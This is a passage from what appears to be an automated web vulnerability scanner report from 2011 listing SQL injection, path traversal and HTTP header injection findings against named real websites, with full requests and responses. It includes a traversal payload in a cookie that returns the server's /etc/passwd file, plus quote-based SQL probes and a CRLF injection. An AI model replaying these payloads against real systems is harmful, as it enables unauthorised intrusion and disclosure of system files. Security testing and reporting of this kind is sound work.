Date: Mon, 18 Apr 2011 17:33:24 GMT
Connection: Keep-Alive
Content-Length: 27694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.75. http://www.millerwelds.com/resources/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /resources/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /resources/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:46 GMT
Connection: Keep-Alive
Content-Length: 21518

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /resources/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:32:48 GMT
Connection: Keep-Alive
Content-Length: 23256

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.76. http://www.millerwelds.com/results/blog/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /results/blog/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /results'/blog/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:26 GMT
Connection: Keep-Alive
Content-Length: 27695

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /results''/blog/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/service/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; evTracker=fc0c626fe6241db934df6d4f182a5f42; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.6.10.1303147760; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:35:27 GMT
Connection: Keep-Alive
Content-Length: 29417

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
1.77. http://www.millerwelds.com/service/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /service/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /service'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:31:21 GMT
Connection: Keep-Alive
Content-Length: 27690

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.78. http://www.millerwelds.com/service/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /service/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /service/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:43 GMT
Connection: Keep-Alive
Content-Length: 22647

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /service/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/wheretobuy/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __qca=P0-154865017-1303147760079; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.2.10.1303147760; evTracker=fc0c626fe6241db934df6d4f182a5f42; _chartbeat2=rr9pb9n2shhrzr4o

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:44 GMT
Connection: Keep-Alive
Content-Length: 24387

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html><!-- InstanceBegin template="blank.dwt" codeOutsideHTMLIsLocked="false"
...[SNIP]...
1.79. http://www.millerwelds.com/wheretobuy/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.millerwelds.com
Path:   /wheretobuy/

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wheretobuy'/ HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response

HTTP/1.1 404 Not Found
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:53 GMT
Connection: Keep-Alive
Content-Length: 27696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
   <
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...
1.80. http://www.millerwelds.com/wheretobuy/ [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.millerwelds.com
Path:   /wheretobuy/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request 1

GET /wheretobuy/?1'=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:14 GMT
Connection: Keep-Alive
Content-Length: 25311

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv
...[SNIP]...
</b>: 1064 (You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1)<br>
...[SNIP]...

Request 2

GET /wheretobuy/?1''=1 HTTP/1.1
Host: www.millerwelds.com
Proxy-Connection: keep-alive
Referer: http://www.millerwelds.com/landingf0d5d%22%3E%3Ca%3E5d463450d54/drive/?utm_source=PowerBlockTV&utm_campaign=toolsthatdrive&utm_medium=bannerad&utm_content=online
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: X-Mapping-chcfmbmj=5B2E5297969312085019D619C67F4E55; __utmz=94003201.1303147760.1.1.utmcsr=PowerBlockTV|utmccn=toolsthatdrive|utmcmd=bannerad|utmcct=online; __utma=94003201.1070057693.1303147760.1303147760.1303147760.1; __utmc=94003201; __utmb=94003201.1.10.1303147760; __qca=P0-154865017-1303147760079

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Date: Mon, 18 Apr 2011 17:30:16 GMT
Connection: Keep-Alive
Content-Length: 27203

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <meta http-equiv
...[SNIP]...
1.81. http://www.socialfollow.com/button/image/ [b parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.socialfollow.com
Path:   /button/image/

Issue detail

The b parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the b parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The database appears to be MySQL.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /button/image/?b=1649' HTTP/1.1
Host: www.socialfollow.com
Proxy-Connection: keep-alive
Referer: http://www3.ipass.com/mobile-employees/find-a-hotspot/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 14:35:09 GMT
Server: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch mod_ssl/2.2.8 OpenSSL/0.9.8g mod_perl/2.0.3 Perl/v5.8.8
X-Powered-By: PHP/5.2.4-2ubuntu5.12
Content-Length: 1288
Content-Type: text/html

<br />
<b>Warning</b>: mysql_fetch_assoc(): supplied argument is not a valid MySQL result resource in <b>/var/www/vhosts/socialfollow.com/httpdocs/button/image/index.php</b> on line <b>3</b><br />
<b
...[SNIP]...
2. File path traversal  previous  next
There are 2 instances of this issue:

Issue background

File path traversal vulnerabilities arise when user-controllable data is used within a filesystem operation in an unsafe manner. Typically, a user-supplied filename is appended to a directory prefix in order to read or write the contents of a file. If vulnerable, an attacker can supply path traversal sequences (using dot-dot-slash characters) to break out of the intended directory and read or write files elsewhere on the filesystem.

This is usually a very serious vulnerability, enabling an attacker to access sensitive files containing configuration data, passwords, database records, log data, source code, and program scripts and binaries.

Issue remediation

Ideally, application functionality should be designed in such a way that user-controllable data does not need to be passed to filesystem operations. This can normally be achieved either by referencing known files via an index number rather than their name, and by using application-generated filenames to save user-supplied file content.

If it is considered unavoidable to pass user-controllable data to a filesystem operation, three layers of defence can be employed to prevent path traversal attacks:

2.1. http://www.rockyou.com/fxtext/fxtext-create.php [lang cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rockyou.com
Path:   /fxtext/fxtext-create.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /fxtext/fxtext-create.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 200 OK
Date: Mon, 18 Apr 2011 23:51:27 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170687; expires=Wed, 27-Jul-2011 23:51:27 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:26 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=7180 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 85570

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...
2.2. http://www.rockyou.com/show_my_gallery.php [lang cookie]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.rockyou.com
Path:   /show_my_gallery.php

Issue detail

The lang cookie is vulnerable to path traversal attacks, enabling read access to arbitrary files on the server.

The payload en../../../../../../../../etc/passwd%00en was submitted in the lang cookie. The requested file was returned in the application's response.

Request

GET /show_my_gallery.php HTTP/1.1
Host: www.rockyou.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: lastlogin=1303164637; lang=en../../../../../../../../etc/passwd%00en; istack=3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com%7C%7C3%7Cwww202.rockyou.com%7C%7C%7Cwww202.rockyou.com; AAMBLFLAG=SET; sns_type=rockyou.com; ryuserid=deleted;

Response

HTTP/1.1 302 Found
Date: Mon, 18 Apr 2011 23:51:04 GMT
Server: Apache/2.2
X-Powered-By: PHP/5.2.6
Location: show_my_gallery2.php?
Set-Cookie: ctid=1; expires=Mon, 25-Apr-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: ryuserid=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Set-Cookie: lastlogin=1303170664; expires=Wed, 27-Jul-2011 23:51:04 GMT; path=/; domain=.rockyou.com
Set-Cookie: sns_type=deleted; expires=Sun, 18-Apr-2010 23:51:03 GMT; path=/; domain=.rockyou.com
Vary: Accept-Encoding,User-Agent
X-RyHeader: www202.rockyou.com took D=9310 microseconds to serve this request
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 17248

root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdow
...[SNIP]...
ucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
dbus:x:81:81:System message bus:/:/sbin/nologin
nscd:x:28:28:NSCD Daemon:/:/sbin/nologin
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
rpc:x:32:32:Portmapp
...[SNIP]...
3. HTTP header injection  previous  next
There are 12 instances of this issue:

Issue background

HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.

Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.

Issue remediation

If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.

3.1. http://ad.doubleclick.net/adj/Rockyou.com/RockYou_Leaderboard_RON [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/Rockyou.com/RockYou_Leaderboard_RON

Issue detail

The value of REST URL parameter 1 is copied into the Location response header. The payload 2f32b%0d%0a0d4ef121642 was submitted in the REST URL parameter 1. This caused a response containing an injected HTTP header.

Request

GET /2f32b%0d%0a0d4ef121642/Rockyou.com/RockYou_Leaderboard_RON;sz=728x90;ord=1161383150732886? HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: ad.doubleclick.net

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html
Content-Length: 36
Location: http://static.2mdn.net/2f32b
